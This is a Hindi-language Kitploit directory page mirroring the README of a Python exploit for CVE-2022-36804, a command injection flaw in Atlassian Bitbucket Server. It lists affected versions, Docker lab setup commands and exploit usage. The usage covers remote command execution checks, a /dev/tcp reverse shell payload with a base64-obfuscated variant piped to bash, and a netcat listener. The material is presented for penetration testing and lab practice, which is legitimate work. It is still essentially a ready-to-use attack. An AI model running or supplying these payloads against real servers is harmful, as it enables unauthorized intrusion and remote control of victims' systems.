Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Atlassian-Bitbucket-CVE-2022-36804 — CVE-2022-36804 कमांड इंजेक्शन के लिए Python exploit, जो Atlassian Bitbucket Server में अनुकूलन योग्य कमांड और Docker लैब वातावरण के साथ दूरस्थ कोड निष्पादन और रिवर्स शेल को सक्षम बनाता है। | Kitploit
उपकरण/GitHubGitHub/imbas007/atlassian-bitbucket-cve-2022-36804
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललैब और अभ्यास
GitHubimbas007/atlassian-bitbucket-cve-2022-36804

Atlassian-Bitbucket-CVE-2022-36804

CVE-2022-36804 कमांड इंजेक्शन के लिए Python exploit, जो Atlassian Bitbucket Server में अनुकूलन योग्य कमांड और Docker लैब वातावरण के साथ दूरस्थ कोड निष्पादन और रिवर्स शेल को सक्षम बनाता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
3 साल पहलेअभी तक समीक्षित नहीं

Atlassian-Bitbucket-Server-CVE-2022-36804

Atlassian Bitbucket Server और Data center के कई API एंडपॉइंट्स में एक गंभीर कमांड इंजेक्शन कमजोरी पाई गई है। यह कमजोरी Bitbucket Server और Data Center के उन सभी संस्करणों को प्रभावित करती है जो <7.6.17, <7.17.10, <7.21.4, <8.0.3, <8.1.2, <8.2.2, और <8.3.1 संस्करणों से पहले जारी किए गए थे।

CVE-2022-36804 के लिए लैब

Docker बनाएँ

root@kitploit:~
docker build -t bitbucket .

Docker चलाएँ

root@kitploit:~
docker run -it bitbucket

cve-2022-36804.py का उपयोग

रिमोट कोड एक्ज़ीक्यूशन (RCE) की जाँच करें

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990

अनुकूलित कमांड (cmd) के साथ RCE की जाँच करें

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id

अनुकूलित कमांड, प्रोजेक्ट की, और रिपॉजिटरी नाम के साथ RCE की जाँच करें

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c whoami -p NEW -r newrepo

netcat के साथ शेल प्राप्त करें

172.17.0.3 को अपने स्थानीय IP पते से बदलें

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "sh -i >& /dev/tcp/172.17.0.2/4444 0>&1"

netcat listener प्रारंभ करें:

root@kitploit:~
nc -lvp 4444

रिवर्स शेल ऑनलाइन : https://www.revshells.com

root@kitploit:~
पेलोड एक्ज़ीक्यूशन त्रुटि के मामले में `sh -i >& /dev/tcp/172.17.0.2/4444 0>&1` को base64 में बदलें।

python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "echo 'c2ggLWkgPiYgL2Rldi90Y3AvMTcyLjE3LjAuMi80NDQ0IDA+JjE=' | base64 -d | bash"

root@kitploit:~
अभ्यास के लिए Windows/Linux मशीन में Bitbucket सर्वर का कमजोर संस्करण स्थापित करने की सिफारिश की जाती है। Docker इमेज की तुलना में रिवर्स शेल प्राप्त करना आसान होगा।

अधिक जानकारी [यहाँ](https://walnutsecurity.com/cve-2022-36804-rce-in-bitbucket-server/) पाई जा सकती है।

# संदर्भ
* https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36804
* https://walnutsecurity.com/cve-2022-36804-rce-in-bitbucket-server/
* https://github.com/walnutsecurity/cve-2022-36804
टूल डाउनलोड करें